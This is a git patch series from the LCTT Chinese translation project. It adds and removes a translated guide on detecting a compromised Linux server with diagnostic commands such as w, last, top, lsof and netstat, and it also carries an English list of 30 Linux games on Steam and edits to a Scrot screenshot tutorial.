+通常攻击者会安装一个后门程序专门监听网络端口接受指令. 该进程等待期间是不会消耗CPU和带宽的,因此也就不容易通过 `top` 之类的命令发现。 + +`lsof` 和 `netstat` 命令都会列出所有的联网进程. 我通常会让他们带上下面这些参数: + +``` +lsof -i + +``` + +``` +netstat -plunt + +``` + +你需要留意那些处于 `LISTEN` 和 `ESTABLISHED` 状态的进程,这些进程要么正在等待连接(LISTEN),要么已经连接(ESTABLISHED)。 +如果遇到不认识的进程,使用 `strace` 和 `lsof` 来看看它们在做什么东西。 + +### 被入侵之后该怎么办呢? + +首先,不要紧张, 尤其当攻击者正处于登陆状态时更不能紧张. 你需要在攻击者警觉到你已经发现他之前夺回机器的控制权。 +如果他发现你已经发觉到他了,那么他可能会锁死你不让你登陆服务器,然后开始毁尸灭迹。 + +如果你技术不太好那么就直接关机吧. 你可以在服务器上运行 `shutdown -h now` 或者 `systemctl poweroff` 这两条命令. 也可以登陆主机提供商的控制面板中关闭服务器。 +关机后,你就可以开始配置防火墙或者咨询一下供应商的意见。 + +如果你对自己颇有自信,而你的主机提供商也有提供上游防火墙,那么你只需要以此创建并启用下面两条规则就行了: + +1. 只允许从你的IP地址登陆SSH + +2. 封禁除此之外的任何东西,不仅仅是SSH,还包括任何端口上的任何协议。 + +这样会立即关闭攻击者的SSH会话,而只留下你访问服务器。 + +如果你无法访问上游防火墙,那么你就需要在服务器本身创建并启用这些防火墙策略,然后在防火墙规则起效后使用 `kill` 命令关闭攻击者的ssh会话。 + +最后还有一种方法, 就是通过诸如串行控制台之类的带外连接登陆服务器,然后通过 `systemctl stop network.service` 停止网络功能。 +这会关闭所有服务器上的网络连接,这样你就可以慢慢的配置那些防火墙规则了。 + +重夺服务器的控制权后,也不要以为就万事大吉了。 + +不要试着修复这台服务器,让后接着用. 你永远不知道攻击者做过什么因此你也永远无法保证这台服务器还是安全的。 + +最好的方法就是拷贝出所有的资料,然后重装系统。 + +-------------------------------------------------------------------------------- + +via: https://bash-prompt.net/guides/server-hacked/ + +作者:[Elliot Cooper][a] +译者:[lujun9972](https://github.com/lujun9972) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://bash-prompt.net diff --git a/sources/tech/20171204 30 Best Linux Games On Steam You Should Play in 2017.md b/sources/tech/20171204 30 Best Linux Games On Steam You Should Play in 2017.md new file mode 100644 index 0000000000..550083bf0a --- /dev/null +++ b/sources/tech/20171204 30 Best Linux Games On Steam You Should Play in 2017.md @@ -0,0 +1,310 @@ +30 Best Linux Games On Steam You Should Play in 2017 +============================================================ + +Last updated December 4, 2017 By [Ankush Das][1] + + + +When it comes to Gaming, a system running on Windows platform is what anyone would recommend. It still is a superior choice for gamers with better graphics driver support and perfect hardware compatibility. But, what about the thought of [gaming on a Linux system][9]? Well, yes, of course – it is possible – maybe you thought of it at some point in time but the collection of Linux games on [Steam for Linux][10] platform wasn’t appealing at all few years back. + +However, that’s not true at all for the current scene. The Steam store now has a lot of great games listed for Linux platform (including a lot of major titles). So, in this article, we’ll be taking a look at the best Linux games on Steam. + +But before we do that, let me tell you a money saving trick. If you are an avid gamer who spends plenty of time and money on gaming, you should subscribe to Humble Monthly. This monthly subscription program from [Humble Bundle][11] gives you $100 in games for just $12 each month. + +Not all games might be available on Linux though but it is still a good deal because you get additional 10% discount on any games or books you buy from [Humble Bundle website][12]. + +The best thing here is that every purchase you make supports a charity organization. So, you are not just gaming, you are also making a difference to the world. + +### Best Linux games on Steam + +The list of best Linux games on steam is in no particular ranking order. + +Additional Note: While there’s a lot of games available on Steam for Linux, there are still a lot of problems you would face as a Linux gamer. You can refer to one of our articles to know about the [annoying experiences every Linux gamer encounters][14]. + +Jump Directly to your preferred genre of Games: + +* [Action Games][3] + +* [RPG Games][4] + +* [Racing/Sports/Simulation Games][5] + +* [Adventure Games][6] + +* [Indie Games][7] + +* [Strategy Games][8] + +### Best Action Games for Linux On Steam + +### 1\. Counter-Strike: Global Offensive (Multiplayer) + +CS GO is definitely one of the best FPS games for Linux on Steam. I don’t think this game needs an introduction but in case you are unaware of it – I must mention that it is one of the most enjoyable FPS multiplayer game you would ever play. You’ll observe CS GO is one of the games contributing a major part to the e-sports scene. To up your rank – you need to play competitive matches. In either case, you can continue playing casual matches. + +I could have listed Rainbow Six siege instead of Counter-Strike, but we still don’t have it for Linux/Steam OS. + +[CS: GO (Purchase)][15] + +### 2\. Left 4 Dead 2 (Multiplayer/Singleplayer) + +One of the most loved first-person zombie shooter multiplayer game. You may get it for as low as 1.3 USD on a Steam sale. It is an interesting game which gives you the chills and thrills you’d expect from a zombie game. The game features swamps, cities, cemetries, and a lot more environments to keep things interesting and horrific. The guns aren’t super techy but definitely provides a realistic experience considering it’s an old game. + +[Left 4 Dead 2 (Purchase)][16] + +### 3\. Borderlands 2 (Singleplayer/Co-op) + +Borderlands 2 is an interesting take on FPS games for PC. It isn’t anything like you experienced before. The graphics look sketchy and cartoony but that does not let you miss the real action you always look for in a first-person shooter game. You can trust me on that! + +If you are looking for one of the best Linux games with tons of DLC – Borderlands 2 will definitely suffice. + +[Borderlands 2 (Purchase)][17] + +### 4\. Insurgency (Multiplayer) + +Insurgency is yet another impressive FPS game available on Steam for Linux machines. It takes a different approach by eliminating the HUD or the ammo counter. As most of the reviewers mentioned – pure shooting game focusing on the weapon and the tactics of your team. It may not be the best FPS game – but it surely is one of them if you like – Delta Force kinda shooters along with your squad. + +[Insurgency (Purchase)][18] + +### 5\. Bioshock: Infinite (Singleplayer) + +Bioshock Infinite would definitely remain as one of the best singleplayer FPS games ever developed for PC. You get unrealistic powers to kill your enemies. And, so do your enemies have a lot of tricks up in the sleeves. It is a story-rich FPS game which you should not miss playing on your Linux system! + +[BioShock: Infinite (Purchase)][19] + +### 6\. HITMAN – Game of the Year Edition (Singleplayer) + +The Hitman series is obviously one of the most loved game series for a PC gamer. The recent iteration of HITMAN series saw an episodic release which wasn’t appreciated much but now with Square Enix gone, the GOTY edition announced with a few more additions is back to the spotlight. Make sure to get creative with your assassinations in the game Agent 47! + +[HITMAN (GOTY)][20] + +### 7\. Portal 2 + +Portal 2 is the perfect blend of action and adventure. It is a puzzle game which lets you join co-op sessions and create interesting puzzles. The co-op mode features a completely different campaign when compared to the single player mode. + +[Portal 2 (Purchase)][21] + +### 8\. Deux Ex: Mankind Divided + +If you are on the lookout for a shooter game focused on stealth skills – Deux Ex would be the perfect addition to your Steam library. It is indeed a very beautiful game with some state-of-the-art weapons and crazy fighting mechanics. + +[Deus Ex: Mankind Divided (Purchase)][22] + +### 9\. Metro 2033 Redux / Metro Last Light Redux + +Both Metro 2033 Redux and the Last Light are the definitive editions of the classic hit Metro 2033 and Last Light. The game has a post-apocalyptic setting. You need to eliminate all the mutants in order to ensure the survival of mankind. You should explore the rest when you get to play it! + +[Metro 2033 Redux (Purchase)][23] + +[Metro Last Light Redux (Purchase)][24] + +### 10\. Tannenberg (Multiplayer) + +Tannenberg is a brand new game – announced a month before this article was published. The game is based on the Eastern Front (1914-1918) as a part of World War I. It is a multiplayer-only game. So, if you want to experience WWI gameplay experience, look no further! + +[Tannenberg (Purchase)][25] + +### Best RPG Games for Linux on Steam + +### 11\. Shadow of Mordor + +Shadow of Mordor is one of the most exciting open world RPG game you will find listed on Steam for Linux systems. You have to fight as a ranger (Talion) with the bright master (Celebrimbor) to defeat Sauron’s army (and then approach killing him). The fighting mechanics are very impressive. It is a must try game! + +[SOM (Purchase)][26] + +### 12\. Divinity: Original Sin – Enhanced Edition + +Divinity: Original is a kick-ass Indie-RPG game that’s unique in itself and very much enjoyable. It is probably one of the highest rated RPG games with a mixture of Adventure & Strategy. The enhanced edition includes new game modes and a complete revamp of voice-overs, controller support, co-op sessions, and so much more. + +[Divinity: Original Sin (Purchase)][27] + +### 13\. Wasteland 2: Director’s Cut + +Wasteland 2 is an amazing CRPG game. If Fallout 4 was to be ported down as a CRPG as well – this is what we would have expected it to be. The director’s cut edition includes a complete visual overhaul with hundred new characters. + +[Wasteland 2 (Purchase)][28] + +### 14\. Darkwood + +A horror-filled top-down view RPG game. You get to explore the world, scavenging materials, and craft weapons to survive. + +[Darkwood (Purchase)][29] + +### Best Racing/Sports/Simulation Games + +### 15\. Rocket League + +Rocket League is an action-packed soccer game conceptualized by rocket-powered battle cars. Not just driving the car and heading to the goal – you can even make your opponents go – kaboom! + +A fantastic sports-action game every gamer must have installed! + +[Rocket League (Purchase)][30] + +### 16\. Road Redemption + +Missing Road Rash? Well, Road Redemption will quench your thirst as a spiritual successor to Road Rash. Ofcourse, it is not officially “Road Rash II” – but it is equally enjoyable. If you loved Road Rash, you’ll like it too. + +[Road Redemption (Purchase)][31] + +### 17\. Dirt Rally + +Dirt Rally is for the gamers who want to experience off-road and on-road racing game. The visuals are breathtaking and the game is enjoyable with near to perfect driving mechanics. + +[Dirt Rally (Purchase)][32] + +### 18\. F1 2017 + +F1 2017 is yet another impressive car racing game from the developers of Dirt Rally (Codemasters & Feral Interactive). It features all of the iconic F1 racing cars that you need to experience. + +[F1 2017 (Purchase)][33] + +### 19. GRID Autosport + +GRID is one of the most underrated car racing games available out there. GRID Autosport is the sequel to GRID 2\. The gameplay seems stunning to me. With even better cars than GRID 2, the GRID Autosport is a recommended racing game for every PC gamer out there. The game also supports a multiplayer mode where you can play with your friends – representing as a team. + +[GRID Autosport (Purchase)][34] + +### Best Adventure Games + +### 20\. ARK: Survival Evolved + +ARK Survival Evolved is a quite decent survival game with exciting adventures following in the due course. You find yourself in the middle of nowhere (ARK Island) and have got no choice except training the dinosaurs, teaming up with other players, hunt someone to get the required resources, and craft items to maximize your chances to survive and escape the Island. + +[ARK: Survival Evolved (Purchase)][35] + +### 21\. This War of Mine + +A unique game where you aren’t a soldier but a civilian facing the hardships of wartime. You’ve to make your way through highly-skilled enemies and help out other survivors as well. + +[This War of Mine (Purchase)][36] + +### 22\. Mad Max + +Mad Max is all about survival and brutality. It includes powerful cars, an open-world setting, weapons, and hand-to-hand combat. You need to keep exploring the place and also focus on upgrading your vehicle to prepare for the worst. You need to think carefully and have a strategy before you make a decision. + +[Mad Max (Purchase)][37] + +### Best Indie Games + +### 23\. Terraria + +It is a 2D game which has received overwhelmingly positive reviews on Steam. Dig, fight, explore, and build to keep your journey going. The environments are automatically generated. So, it isn’t anything static. You might encounter something first and your friend might encounter the same after a while. You’ll also get to experience creative 2D action-packed sequences. + +[Terraria (Purchase)][38] + +### 24\. Kingdoms and Castles + +With Kingdoms and Castles, you get to build your own kingdom. You have to manage your kingdom by collecting tax (as funds necessary) from the people, take care of the forests, handle the city + +design, and also make sure no one raids your kingdom by implementing proper defences. + +It is a fairly new game but quite trending among the Indie genre of games. + +[Kingdoms and Castles][39] + +### Best Strategy Games on Steam For Linux Machines + +### 25\. Sid Meier’s Civilization V + +Sid Meier’s Civilization V is one of the best-rated strategy game available for PC. You could opt for Civilization VI – if you want. But, the gamers still root for Sid Meier’s Civilization V because of its originality and creative implementation. + +[Civilization V (Purchase)][40] + +### 26\. Total War: Warhammer + +Total War: Warhammer is an incredible turn-based strategy game available for PC. Sadly, the Warhammer II isn’t available for Linux as of yet. But 2016’s Warhammer is still a great choice if you like real-time battles that involve building/destroying empires with flying creatures and magical powers. + +[Warhammer I (Purchase)][41] + +### 27\. Bomber Crew + +Wanted a strategy simulation game that’s equally fun to play? Bomber Crew is the answer to it. You need to choose the right crew and maintain it in order to win it all. + +[Bomber Crew (Purchase)][42] + +### 28\. Age of Wonders III + +A very popular strategy title with a mixture of empire building, role playing, and warfare. A polished turn-based strategy game you must try! + +[Age of Wonders III (Purchase)][43] + +### 29\. Cities: Skylines + +A pretty straightforward strategy game to build a city from scratch and manage everything in it. You’ll experience the thrills and hardships of building and maintaining a city. I wouldn’t expect every gamer to like this game – it has a very specific userbase. + +[Cities: Skylines (Purchase)][44] + +### 30\. XCOM 2 + +XCOM 2 is one of the best turn-based strategy game available for PC. I wonder how crazy it could have been to have XCOM 2 as a first person shooter game. However, it’s still a masterpiece with an overwhelming response from almost everyone who bought the game. If you have the budget to spend more on this game, do get the – “War of the Chosen” – DLC. + +[XCOM 2 (Purchase)][45] + +### Wrapping Up + +Among all the games available for Linux, we did include most of the major titles and some the latest games with an overwhelming response from the gamers. + +Do you think we missed any of your favorite Linux game available on Steam? Also, what are the games that you would like to see on Steam for Linux platform? + +Let us know your thoughts in the comments below. + +-------------------------------------------------------------------------------- + +via: https://itsfoss.com/best-linux-games-steam/ + +作者:[Ankush Das][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://itsfoss.com/author/ankush/ +[1]:https://itsfoss.com/author/ankush/ +[2]:https://itsfoss.com/best-linux-games-steam/#comments +[3]:https://itsfoss.com/best-linux-games-steam/#action +[4]:https://itsfoss.com/best-linux-games-steam/#rpg +[5]:https://itsfoss.com/best-linux-games-steam/#racing +[6]:https://itsfoss.com/best-linux-games-steam/#adv +[7]:https://itsfoss.com/best-linux-games-steam/#indie +[8]:https://itsfoss.com/best-linux-games-steam/#strategy +[9]:https://itsfoss.com/linux-gaming-guide/ +[10]:https://itsfoss.com/install-steam-ubuntu-linux/ +[11]:https://www.humblebundle.com/?partner=itsfoss +[12]:https://www.humblebundle.com/store?partner=itsfoss +[13]:https://www.humblebundle.com/monthly?partner=itsfoss +[14]:https://itsfoss.com/linux-gaming-problems/ +[15]:http://store.steampowered.com/app/730/CounterStrike_Global_Offensive/ +[16]:http://store.steampowered.com/app/550/Left_4_Dead_2/ +[17]:http://store.steampowered.com/app/49520/?snr=1_5_9__205 +[18]:http://store.steampowered.com/app/222880/?snr=1_5_9__205 +[19]:http://store.steampowered.com/agecheck/app/8870/ +[20]:http://store.steampowered.com/app/236870/?snr=1_5_9__205 +[21]:http://store.steampowered.com/app/620/?snr=1_5_9__205 +[22]:http://store.steampowered.com/app/337000/?snr=1_5_9__205 +[23]:http://store.steampowered.com/app/286690/?snr=1_5_9__205 +[24]:http://store.steampowered.com/app/287390/?snr=1_5_9__205 +[25]:http://store.steampowered.com/app/633460/?snr=1_5_9__205 +[26]:http://store.steampowered.com/app/241930/?snr=1_5_9__205 +[27]:http://store.steampowered.com/app/373420/?snr=1_5_9__205 +[28]:http://store.steampowered.com/app/240760/?snr=1_5_9__205 +[29]:http://store.steampowered.com/app/274520/?snr=1_5_9__205 +[30]:http://store.steampowered.com/app/252950/?snr=1_5_9__205 +[31]:http://store.steampowered.com/app/300380/?snr=1_5_9__205 +[32]:http://store.steampowered.com/app/310560/?snr=1_5_9__205 +[33]:http://store.steampowered.com/app/515220/?snr=1_5_9__205 +[34]:http://store.steampowered.com/app/255220/?snr=1_5_9__205 +[35]:http://store.steampowered.com/app/346110/?snr=1_5_9__205 +[36]:http://store.steampowered.com/app/282070/?snr=1_5_9__205 +[37]:http://store.steampowered.com/app/234140/?snr=1_5_9__205 +[38]:http://store.steampowered.com/app/105600/?snr=1_5_9__205 +[39]:http://store.steampowered.com/app/569480/?snr=1_5_9__205 +[40]:http://store.steampowered.com/app/8930/?snr=1_5_9__205 +[41]:http://store.steampowered.com/app/364360/?snr=1_5_9__205 +[42]:http://store.steampowered.com/app/537800/?snr=1_5_9__205 +[43]:http://store.steampowered.com/app/226840/?snr=1_5_9__205 +[44]:http://store.steampowered.com/app/255710/?snr=1_5_9__205 +[45]:http://store.steampowered.com/app/268500/?snr=1_5_9__205 +[46]:https://www.facebook.com/share.php?u=https%3A%2F%2Fitsfoss.com%2Fbest-linux-games-steam%2F%3Futm_source%3Dfacebook%26utm_medium%3Dsocial%26utm_campaign%3DSocialWarfare +[47]:https://twitter.com/share?original_referer=/&text=30+Best+Linux+Games+On+Steam+You+Should+Play+in+2017&url=https://itsfoss.com/best-linux-games-steam/%3Futm_source%3Dtwitter%26utm_medium%3Dsocial%26utm_campaign%3DSocialWarfare&via=ankushdas9 +[48]:https://plus.google.com/share?url=https%3A%2F%2Fitsfoss.com%2Fbest-linux-games-steam%2F%3Futm_source%3DgooglePlus%26utm_medium%3Dsocial%26utm_campaign%3DSocialWarfare +[49]:https://www.linkedin.com/cws/share?url=https%3A%2F%2Fitsfoss.com%2Fbest-linux-games-steam%2F%3Futm_source%3DlinkedIn%26utm_medium%3Dsocial%26utm_campaign%3DSocialWarfare +[50]:https://www.reddit.com/submit?url=https://itsfoss.com/best-linux-games-steam/&title=30+Best+Linux+Games+On+Steam+You+Should+Play+in+2017 From dc79d8f774a883f0b4ca31a35859dd02aa6ba9b9 Mon Sep 17 00:00:00 2001 From: darksun Date: Tue, 5 Dec 2017 14:34:35 +0800 Subject: [PATCH 0300/1627] remove useless file --- ... Your Linux Server Has Been Compromised.md | 163 ------------------ 1 file changed, 163 deletions(-) delete mode 100644 sources/tech/20171128 How To Tell If Your Linux Server Has Been Compromised.md diff --git a/sources/tech/20171128 How To Tell If Your Linux Server Has Been Compromised.md b/sources/tech/20171128 How To Tell If Your Linux Server Has Been Compromised.md deleted file mode 100644 index 29fe95d868..0000000000 --- a/sources/tech/20171128 How To Tell If Your Linux Server Has Been Compromised.md +++ /dev/null @@ -1,163 +0,0 @@ -如何判断Linux服务器是否被入侵 --------------- - -本指南中所谓的服务器被入侵或者说被黑了的意思是指未经认证的人或程序为了自己的目的登录到服务器上去并使用其计算资源, 通常会产生不好的影响。 - -免责声明: 若你的服务器被类似NSA这样的国家机关或者某个犯罪集团如请,那么你并不会发现有任何问题,这些技术也无法发觉他们的存在。 - -然而, 大多数被攻破的服务器都是被类似自动攻击程序这样的程序或者类似“脚本小子”这样的廉价攻击者,以及蠢蛋犯罪所入侵的。 - -这类攻击者会在访问服务器的同时滥用服务器资源,并且不怎么会采取措施来隐藏他们正在做的事情。 - -### 入侵服务器的症状 - -当服务器被没有经验攻击者或者自动攻击程序入侵了的话,他们往往会消耗100%的资源. 他们可能消耗CPU资源来进行数字货币的采矿或者发送垃圾邮件,也可能消耗带宽来发动 `DoS` 攻击。 - -因此出现问题的第一个表现就是服务器 “变慢了”. 这可能表现在网站的页面打开的很慢, 或者电子邮件要花很长时间才能发送出去。 - -那么你应该查看那些东西呢? - -#### 检查 1 - 当前都有谁在登录? - -你首先要查看当前都有谁登录在服务器上. 发现攻击者登录到服务器上进行操作并不罕见。 - -其对应的命令是 `w`. 运行 `w` 会输出如下结果: - -``` - 08:32:55 up 98 days, 5:43, 2 users, load average: 0.05, 0.03, 0.00 -USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT -root pts/0 113.174.161.1 08:26 0.00s 0.03s 0.02s ssh root@coopeaa12 -root pts/1 78.31.109.1 08:26 0.00s 0.01s 0.00s w - -``` - -第一个IP是英国IP,而第二个IP是越南IP. 这个不是个好兆头。 - -停下来做个深呼吸, 不要紧,只需要杀掉他们的SSH连接就好了. Unless you can stop then re-entering the server they will do so quickly and quite likely kick you off and stop you getting back in。 - -请参阅本文最后的 `入侵之后怎么办` 这一章节来看发现被入侵的证据后应该怎么办。 - -`whois` 命令可以接一个IP地址然后告诉你IP注册的组织的所有信息, 当然就包括所在国家的信息。 - -#### 检查 2 - 谁曾经登录过? - -Linux 服务器会记录下哪些用户,从哪个IP,在什么时候登录的以及登陆了多长时间这些信息. 使用 `last` 命令可以查看这些信息。 - -输出类似这样: - -``` -root pts/1 78.31.109.1 Thu Nov 30 08:26 still logged in -root pts/0 113.174.161.1 Thu Nov 30 08:26 still logged in -root pts/1 78.31.109.1 Thu Nov 30 08:24 - 08:26 (00:01) -root pts/0 113.174.161.1 Wed Nov 29 12:34 - 12:52 (00:18) -root pts/0 14.176.196.1 Mon Nov 27 13:32 - 13:53 (00:21) - -``` - -这里可以看到英国IP和越南IP交替出现, 而且最上面两个IP现在还处于登录状态. 如果你看到任何未经授权的IP,那么请参阅最后章节。 - -登录历史记录会以文本格式记录到 `~/.bash_history`(注:这里作者应该写错了)中,因此很容易被删除。 -通常攻击者会直接把这个文件删掉,以掩盖他们的攻击行为. 因此, 若你运行了 `last` 命令却只看得见你的当前登录,那么这就是个不妙的信号。 - -如果没有登录历史的话,请一定小心,继续留意入侵的其他线索。 - -#### 检查 3 - 回顾命令历史 - -这个层次的攻击者通常不会注意掩盖命令的历史记录,因此运行 `history` 命令会显示出他们曾经做过的所有事情。 -一定留意有没有用 `wget` 或 `curl` 命令来下载类似垃圾邮件机器人或者挖矿程序之类的软件。 - -命令历史存储在 `~/.bash_history` 文件中,因此有些攻击者会删除该文件以掩盖他们的所作所为。 -跟登录历史一样, 若你运行 `history` 命令却没有输出任何东西那就表示历史文件被删掉了. 这也是个不妙的信号,你需要很小心地检查一下服务器了。 - -#### 检查 4 - 哪些进程在消耗CPU? - -你常遇到的这类攻击者通常不怎么会去掩盖他们做的事情. 他们会运行一些特别消耗CPU的进程. 这就很容易发着这些进程了. 只需要运行 `top` 然后看最前的那几个进程就行了。 - -这也能显示出那些未登录的攻击者来. 比如,可能有人在用未受保护的邮件脚本来发送垃圾邮件。 - -如果你最上面的进程对不了解,那么你可以google一下进程名称,或者通过 `losf` 和 `strace` 来看看它做的事情是什么。 - -使用这些工具,第一步从 `top` 中拷贝出进程的 PID,然后运行: - -```shell -strace -p PID - -``` - -这会显示出进程调用的所有系统调用. 它产生的内容会很多,但这些信息能告诉你这个进程在做什么。 - -``` -lsof -p PID - -``` - -这个程序会列出进程打开的文件. 通过查看它访问的文件可以很好的理解它在做的事情。 - -#### 检查 5 - 检查所有的系统进程 - -消耗CPU不严重的未认证进程可能不会在 `top` 中显露出来,不过它依然可以通过 `ps` 列出来. 命令 `ps auxf` 就能显示足够清晰的信息了。 - -你需要检查一下每个不认识的进程. 经常运行 `ps` (这是个好习惯) 能帮助你发现奇怪的进程。 - -#### 检查 6 - 检查进程的网络使用情况 - -`iftop` 的功能类似 `top`,他会显示一系列收发网络数据的进程以及他们的源地址和目的地址。 -类似 `DoS` 攻击或垃圾制造器这样的进程很容易显示在列表的最顶端。 - -#### 检查 7 - 哪些进程在监听网络连接? - -通常攻击者会安装一个后门程序专门监听网络端口接受指令. 该进程等待期间是不会消耗CPU和带宽的,因此也就不容易通过 `top` 之类的命令发现。 - -`lsof` 和 `netstat` 命令都会列出所有的联网进程. 我通常会让他们带上下面这些参数: - -``` -lsof -i - -``` - -``` -netstat -plunt - -``` - -你需要留意那些处于 `LISTEN` 和 `ESTABLISHED` 状态的进程,这些进程要么正在等待连接(LISTEN),要么已经连接(ESTABLISHED)。 -如果遇到不认识的进程,使用 `strace` 和 `lsof` 来看看它们在做什么东西。 - -### 被入侵之后该怎么办呢? - -首先,不要紧张, 尤其当攻击者正处于登陆状态时更不能紧张. 你需要在攻击者警觉到你已经发现他之前夺回机器的控制权。 -如果他发现你已经发觉到他了,那么他可能会锁死你不让你登陆服务器,然后开始毁尸灭迹。 - -如果你技术不太好那么就直接关机吧. 你可以在服务器上运行 `shutdown -h now` 或者 `systemctl poweroff` 这两条命令. 也可以登陆主机提供商的控制面板中关闭服务器。 -关机后,你就可以开始配置防火墙或者咨询一下供应商的意见。 - -如果你对自己颇有自信,而你的主机提供商也有提供上游防火墙,那么你只需要以此创建并启用下面两条规则就行了: - -1. 只允许从你的IP地址登陆SSH - -2. 封禁除此之外的任何东西,不仅仅是SSH,还包括任何端口上的任何协议。 - -这样会立即关闭攻击者的SSH会话,而只留下你访问服务器。 - -如果你无法访问上游防火墙,那么你就需要在服务器本身创建并启用这些防火墙策略,然后在防火墙规则起效后使用 `kill` 命令关闭攻击者的ssh会话。 - -最后还有一种方法, 就是通过诸如串行控制台之类的带外连接登陆服务器,然后通过 `systemctl stop network.service` 停止网络功能。 -这会关闭所有服务器上的网络连接,这样你就可以慢慢的配置那些防火墙规则了。 - -重夺服务器的控制权后,也不要以为就万事大吉了。 - -不要试着修复这台服务器,让后接着用. 你永远不知道攻击者做过什么因此你也永远无法保证这台服务器还是安全的。 - -最好的方法就是拷贝出所有的资料,然后重装系统。 - --------------------------------------------------------------------------------- - -via: https://bash-prompt.net/guides/server-hacked/ - -作者:[Elliot Cooper][a] -译者:[lujun9972](https://github.com/lujun9972) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://bash-prompt.net From caa83b13bc5419b1a3f292f02fddaad032210c76 Mon Sep 17 00:00:00 2001 From: Ezio Date: Tue, 5 Dec 2017 15:14:15 +0800 Subject: [PATCH 0301/1627] =?UTF-8?q?=E5=B0=8F=E9=97=AE=E9=A2=98?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...04 30 Best Linux Games On Steam You Should Play in 2017.md | 4 ---- 1 file changed, 4 deletions(-) diff --git a/sources/tech/20171204 30 Best Linux Games On Steam You Should Play in 2017.md b/sources/tech/20171204 30 Best Linux Games On Steam You Should Play in 2017.md index 550083bf0a..3248358b37 100644 --- a/sources/tech/20171204 30 Best Linux Games On Steam You Should Play in 2017.md +++ b/sources/tech/20171204 30 Best Linux Games On Steam You Should Play in 2017.md @@ -1,10 +1,6 @@ 30 Best Linux Games On Steam You Should Play in 2017 ============================================================ -Last updated December 4, 2017 By [Ankush Das][1] - - - When it comes to Gaming, a system running on Windows platform is what anyone would recommend. It still is a superior choice for gamers with better graphics driver support and perfect hardware compatibility. But, what about the thought of [gaming on a Linux system][9]? Well, yes, of course – it is possible – maybe you thought of it at some point in time but the collection of Linux games on [Steam for Linux][10] platform wasn’t appealing at all few years back. However, that’s not true at all for the current scene. The Steam store now has a lot of great games listed for Linux platform (including a lot of major titles). So, in this article, we’ll be taking a look at the best Linux games on Steam. From 00acb86f2057a974e2ef614fe98e6a09704f3282 Mon Sep 17 00:00:00 2001 From: wxy Date: Tue, 5 Dec 2017 16:21:28 +0800 Subject: [PATCH 0302/1627] PRF&PUB:20170215 How to take screenshots on Linux using Scrot.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit @zpl1025 由于内容安排,本篇预计发布在下周一。 --- ...o take screenshots on Linux using Scrot.md | 112 ++++++++++-------- 1 file changed, 61 insertions(+), 51 deletions(-) diff --git a/translated/tech/20170215 How to take screenshots on Linux using Scrot.md b/translated/tech/20170215 How to take screenshots on Linux using Scrot.md index 1ddefb37eb..7dd59aeaf4 100644 --- a/translated/tech/20170215 How to take screenshots on Linux using Scrot.md +++ b/translated/tech/20170215 How to take screenshots on Linux using Scrot.md @@ -1,41 +1,27 @@ 如何在 Linux 系统里用 Scrot 截屏 ============================================================ -### 文章主要内容 - -1. [关于 Scrot][12] -2. [安装 Scrot][13] -3. [Scrot 的使用和特点][14] - 1. [获取程序版本][1] - 2. [抓取当前窗口][2] - 3. [抓取选定窗口][3] - 4. [在截屏时包含窗口边框][4] - 5. [延时截屏][5] - 6. [截屏前倒数][6] - 7. [图片质量][7] - 8. [生成缩略图][8] - 9. [拼接多显示器截屏][9] - 10. [在保存截图后执行操作][10] - 11. [特殊字符串][11] -4. [结论][15] - -最近,我们介绍过 [gnome-screenshot][17] 工具,这是一个很优秀的屏幕抓取工具。但如果你想找一个在命令行运行的更好用的截屏工具,你一定要试试 Scrot。这个工具有一些 gnome-screenshot 没有的独特功能。在这片文章里,我们会通过简单易懂的例子来详细介绍 Scrot。 +最近,我们介绍过 [gnome-screenshot][17] 工具,这是一个很优秀的屏幕抓取工具。但如果你想找一个在命令行运行的更好用的截屏工具,你一定要试试 Scrot。这个工具有一些 gnome-screenshot 没有的独特功能。在这篇文章里,我们会通过简单易懂的例子来详细介绍 Scrot。 请注意一下,这篇文章里的所有例子都在 Ubuntu 16.04 LTS 上测试过,我们用的 scrot 版本是 0.8。 ### 关于 Scrot -[Scrot][18] (**SCR**eensh**OT**) 是一个屏幕抓取工具,使用 imlib2 库来获取和保存图片。由 Tom Gilbert 用 C 语言开发完成,通过 BSD 协议授权。 +[Scrot][18] (**SCR**eensh**OT**) 是一个屏幕抓取工具,使用 imlib2 库来获取和保存图片。由 Tom Gilbert 用 C 语言开发完成,通过 BSD 协议授权。 ### 安装 Scrot scort 工具可能在你的 Ubuntu 系统里预装了,不过如果没有的话,你可以用下面的命令安装: +``` sudo apt-get install scrot +``` 安装完成后,你可以通过下面的命令来使用: +``` scrot [options] [filename] +``` **注意**:方括号里的参数是可选的。 @@ -51,13 +37,17 @@ scrot [options] [filename] 默认情况下,抓取的截图会用带时间戳的文件名保存到当前目录下,不过你也可以在运行命令时指定截图文件名。比如: +``` scrot [image-name].png +``` ### 获取程序版本 -你想的话,可以用 -v 选项来查看 scrot 的版本。 +你想的话,可以用 `-v` 选项来查看 scrot 的版本。 +``` scrot -v +``` 这是例子: @@ -67,10 +57,11 @@ scrot -v ### 抓取当前窗口 -这个工具可以限制抓取当前的焦点窗口。这个功能可以通过 -u 选项打开。 +这个工具可以限制抓取当前的焦点窗口。这个功能可以通过 `-u` 选项打开。 +``` scrot -u - +``` 例如,这是我在命令行执行上边命令时的桌面: [ @@ -85,9 +76,11 @@ scrot -u ### 抓取选定窗口 -这个工具还可以让你抓取任意用鼠标点击的窗口。这个功能可以用 -s 选项打开。 +这个工具还可以让你抓取任意用鼠标点击的窗口。这个功能可以用 `-s` 选项打开。 +``` scrot -s +``` 例如,在下面的截图里你可以看到,我有两个互相重叠的终端窗口。我在上层的窗口里执行上面的命令。 @@ -95,7 +88,7 @@ scrot -s ![选择窗口](https://www.howtoforge.com/images/how-to-take-screenshots-in-linux-with-scrot/select1.png) ][23] 